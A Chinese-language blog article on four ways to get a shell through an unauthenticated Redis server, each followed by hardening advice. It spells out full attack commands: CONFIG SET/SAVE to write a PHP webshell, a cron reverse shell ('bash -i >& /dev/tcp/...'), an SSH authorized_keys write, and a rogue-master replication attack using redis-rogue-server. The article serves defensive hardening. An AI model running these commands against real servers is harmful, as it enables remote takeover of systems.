当前位置: 首页 > news >正文

redis数据库的四种取得 shell方法

 Redis作为高性能内存数据库,若配置不当(特别是未授权访问),将面临极高安全风险。攻击者可利用漏洞实现远程代码执行(GetShell),严重威胁数据安全与服务器控制权。本文深入剖析此类漏洞的核心原理与攻击路径,并重点提供全面、有效的加固方案,帮助开发者和运维人员构建安全的Redis环境。 

当Redis服务满足以下条件时,会有shell方法:

1.  绑定公网IP: `bind 0.0.0.0` 或未正确限制绑定地址。
2.  缺乏认证: 未设置 `requirepass` 或使用弱密码。
3.  权限过高: Redis进程用户拥有对关键系统目录(如Web根目录、Cron目录、SSH目录)的写入权限。
4.  高危命令未禁用: `CONFIG`, `SAVE`, `SLAVEOF` 等命令可被攻击者利用。

攻击者一旦通过网络访问到未授权Redis服务,即可尝试多种路径实现GetShell。

 攻击路径分析与防御方案

 路径一:Web目录写入恶意文件 (WebShell)

   原理简述: 攻击者利用`CONFIG SET`命令修改Redis数据持久化路径(`dir`)和文件名(`dbfilename`),指向Web服务器目录(如`/var/www/html`),并将恶意代码(如PHP WebShell)作为键值写入数据库,最后通过`SAVE`命令将数据持久化到磁盘文件。访问该Web文件即可执行任意命令。

1.连接Redis​

使用redis-cli连接目标Redis:

redis-cli -h 目标IP -p 6379
2. 修改Redis配置​

通过CONFIG SET命令设置数据库存储路径和文件名:

CONFIG SET dir /var/www/html # 修改存储路径为Web目录CONFIG SET dbfilename shell.php # 设置文件名为shell.ph
3. 写入恶意脚本​

使用SET命令写入PHP WebShell内容:

SET shell "<?php system($_GET['cmd']);?>"
4. 保存配置​

执行SAVE命令将数据持久化到磁盘:

SAVE

此时/var/www/html/shell.php文件已生成,可通过浏览器访问http://目标IP/shell.php?cmd=whoami验证。

   防御关键点:
禁止Redis写入Web目录: 严格限制Redis进程用户权限,确保其无权访问Web根目录及其子目录。
禁用高危命令: 在`redis.conf`中禁用`CONFIG`和`SAVE`命令。
```conf
rename-command CONFIG ""
rename-command SAVE ""   或根据业务需求重命名为复杂字符串
```
隔离部署: Redis服务应与Web应用服务器部署在不同的安全域或容器中。

方法二:利用定时任务(Cron)执行反弹Shell

   原理简述: 攻击者修改Redis持久化路径指向系统定时任务目录(如`/var/spool/cron/`),设置文件名(如`root`),并将包含反弹Shell命令的字符串作为键值写入。`SAVE`后,系统会定时执行该命令,攻击者监听端口即可获得Shell。

1.. 连接Redis并修改配置​​

redis-cli -h 目标IP -p 6379CONFIG SET dir /var/spool/cron/  # 修改存储路径为cron目录CONFIG SET dbfilename root      # 文件名为root(针对root用户的cron)

2. 写入反弹Shell命令​​

反弹Shell到攻击机(假设攻击机IP为192.168.1.100,端口4444):

SET root "\n\n*/1 * * * * bash -i >& /dev/tcp/192.168.1.100/4444 0>&1\n\n"

    ​​注意​​:

        \n\n用于避免破坏cron文件格式。
定时任务每分钟执行一次,连接攻击机。

3. 保存配置​​

SAVE

攻击机监听端口:

nc -lvvp 4444

若连接成功,可执行任意命令(如whoami)。

   防御关键点:
严格限制目录权限: Redis进程用户绝对禁止拥有对`/var/spool/cron/`及其下文件的写入权限。使用最小权限原则运行Redis(如专用低权用户`redis`)。
监控Cron目录: 部署文件完整性监控或安全Agent,监控`/var/spool/cron/`目录的异常变更。
禁用`SAVE`命令: 同上。

方法三:写入SSH公钥实现免密登录

   原理简述: 攻击者修改Redis持久化路径指向目标用户(通常是root)的`.ssh`目录,设置文件名为`authorized_keys`,并将攻击者的公钥作为键值写入。`SAVE`后,攻击者即可使用对应私钥直接SSH登录服务器。

1. 生成SSH密钥对​

在攻击机上生成密钥对(若已有可跳过):

ssh-keygen -t rsa  # 默认保存到~/.ssh/id_rsa.pub
2. 连接Redis并修改配置​
redis-cli -h 目标IP -p 6379CONFIG SET dir /root/.ssh/ # 修改存储路径为.ssh目录CONFIG SET dbfilename authorized_keys # 文件名为authorized_keys
3. 写入公钥​

将公钥内容写入Redis(需替换实际公钥):

SET authorized_keys "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQ...攻击机公钥内容..."
4. 保存配置​
SAVE

攻击机直接SSH登录目标服务器:

ssh root@目标IP

无需密码即可登录。

   防御关键点:
保护.ssh目录: Redis进程用户必须无权访问任何用户的`.ssh`目录(尤其是`/root/.ssh/`)。确保`.ssh`目录权限为`700`,`authorized_keys`文件权限为`600`。
禁用`SAVE`命令: 同上。
考虑禁用密码登录: 对于关键服务器,可配置SSH仅允许密钥认证。

方法四:恶意主从复制 (Master-Slave Replication)

   原理简述: Redis主从复制时,从节点会加载主节点生成的RDB文件。攻击者搭建恶意Redis主节点,构造包含恶意模块或特殊载荷的RDB文件。诱骗目标Redis(未授权)执行`SLAVEOF`命令指向恶意主节点后,目标Redis加载恶意RDB文件时触发代码执行。

1. 攻击机生成恶意RDB文件​​

    使用redis-rogue-server工具(需Python环境)生成包含恶意模块的RDB文件:

    git clone https://github.com/n0b0dyCN/redis-rogue-server.gitcd redis-rogue-serverpip3 install -r requirements.txtpython3 redis-rogue-server.py --rhost 目标IP --lhost 攻击机IP

  工具会自动生成恶意RDB文件并启动监听。

2. 配置目标Redis为主从复制​​

在攻击机上执行:

   redis-cli -h 目标IP -p 6379SLAVEOF 攻击机IP 6379  # 将目标Redis设为从节点,连接攻击机CONFIG SET masterauth ""  # 若主节点有密码需配置(此处无密码)

目标Redis会尝试从攻击机拉取RDB文件并加载,触发恶意代码执行。

3. 获取反弹Shell​​

攻击机监听端口(如4444):

nc -lvvp 4444

   防御关键点:
禁用未授权Redis的主从复制: 对于暴露在风险中的Redis,禁止其作为从节点连接不可信主节点。可通过配置或防火墙规则限制。
设置`masterauth`: 如果必须使用主从复制,主节点必须设置强密码,并在从节点配置`masterauth`。
设置`replica-read-only yes`: 确保从节点是只读的(默认行为)。
及时升级: 保持Redis版本为最新,修复已知的漏洞。

 三、 redis预防shell

1.  最小化网络暴露 
禁止公网绑定: `bind 127.0.0.1` (或内网可信IP),绝对避免 `bind 0.0.0.0`。
防火墙封锁: 使用系统防火墙或云安全组,严格限制访问Redis端口(默认6379)的源IP,仅允许必要的应用服务器或管理IP访问。

2.  启用强密码认证:
在`redis.conf`中设置复杂密码:`requirepass YourVeryStrongPasswordHere!@`。密码需足够长(>16字符)、包含大小写字母、数字、特殊字符,并定期更换。

3.  以最小权限运行:
创建专用低权限用户(如`redis`)来运行Redis服务:`useradd -r -s /bin/false redis`。
确保该用户仅拥有操作Redis自身数据文件和配置文件的必要权限,无权写入任何系统目录或敏感目录。

4.  禁用高危命令:
在`redis.conf`中禁用或重命名关键命令:
```conf
rename-command FLUSHALL    清空所有数据库
rename-command CONFIG    修改配置
rename-command SHUTDOWN     关闭服务器
rename-command SAVE            阻塞式持久化 (考虑业务需求)
rename-command BGSAVE          后台持久化 (考虑业务需求)
rename-command SLAVEOF         主从复制
rename-command EVAL            执行Lua脚本
如需使用,重命名为复杂不易猜测的名字
rename-command CONFIG "S0m3R4nd0mUnGu3$$4bl3Str1ng"
```

5.  启用保护模式: `protected-mode yes` (默认开启)。当未设置`bind`且没有密码时,此模式会拒绝外部连接。

6.  配置文件和目录权限:
确保`redis.conf`及Redis数据目录(`dir`)的权限严格,仅允许Redis用户和必要管理员访问。
`chown -R redis:redis /path/to/redis/data`
`chmod 700 /path/to/redis/data`
`chmod 600 /path/to/redis/redis.conf`

7.  启用日志记录与监控:
配置`logfile`路径和`loglevel notice` (或`warning`)。
集中收集和分析Redis日志,监控异常登录尝试、高危命令执行(如果未被禁用)、配置变更等。
使用Prometheus+Grafana或云监控服务监控Redis性能指标。

8.  定期更新与打补丁: 关注Redis官方安全公告,及时升级到稳定版本。

9.  安全审计:
定期使用`redis-cli -a yourpassword --no-auth-warning CONFIG GET ` (或使用其他安全工具)审计配置项,检查是否有未授权的修改。
审计系统关键目录(`/var/www/`, `/var/spool/cron/`, `~/.ssh/`)的文件列表和权限。

 四、 总结

Redis的未授权访问漏洞是极其严重的安全隐患,直接导致服务器被完全控制。防御的核心在于“阻断攻击路径”和“最小化风险暴露”:

1.  网络隔离: 绝不暴露在公网,严格控制访问源。
2.  强认证: 必须设置复杂密码。
3.  最小权限: Redis进程权限必须严格受限。
4.  命令管控: 禁用或重命名高危命令(特别是`CONFIG`, `SAVE`, `SLAVEOF`)。
5.  纵深防御: 结合防火墙、权限控制、日志监控、定期审计等多层防护。

通过实施上述全面的安全加固措施,可以有效抵御利用Redis未授权访问漏洞进行的GetShell攻击,保障Redis服务及底层服务器的安全稳定运行。安全配置应作为Redis部署的标准步骤,而非事后补救措施。

http://www.lryc.cn/news/602676.html

相关文章:

  • 安宝特案例丨户外通信机房施工革新:AR+作业流技术破解行业难题
  • 免费版酒店收银系统弹窗在押金原路退回流程中的应用价值探究 ——仙盟创梦IDE
  • 设计模式(二十一)行为型:状态模式详解
  • python生成 requirement.txt 文件
  • fchown/fchownat系统调用及示例
  • 技术总结|如何使用提升 strlen 的性能?
  • lesson26-2:使用Tkinter打造简易画图软件优化版
  • 数据链路层 和 ARP协议
  • MQTT的原理
  • 华为Huawei 6730交换机查看接口收发光命令 transceiver
  • 9.c语言常用算法
  • Anaconda创建环境报错:CondaHTTPEFTOT: HTTP 403 FORBIDDEN for url
  • Linux中配置haproxy
  • gitlab 在线合并分支a-分支b,解决冲突后,反向合并分支b-分支a
  • 数据结构——图(二、图的存储和基本操作)
  • 人机交互打字游戏
  • Leetcode——11. 盛最多水的容器
  • 力扣-39.组合总和
  • PhpStorm + PHP8.1 + XDebug3 实现断点调试(亲测可用)
  • 面试问题收集——卷积神经网络
  • 从 “看天吃饭” 到 “精准可控”:边缘计算网关如何引爆智慧农业种植变革?
  • 计算机毕设分享-基于SpringBoot的健身房管理系统(开题报告+前后端源码+Lun文+开发文档+数据库设计文档)
  • 服务器多线主要是指什么?
  • 服务器查日志太慢,试试grep组合拳
  • 数据中心入门学习(四):服务器概述与PCIe总线
  • 数据结构面经
  • 坚鹏:AI智能体培训是知行学成为AI智能体创新应用引领者的基础
  • 【Spring Boot 快速开发】一、入门
  • AI技术落地的综合实战经验报告,结合最新行业案例、代码示例及可视化图表,系统阐述AI在开发提效、算法优化与行业应用中的实践路径。
  • Python将Word转换为Excel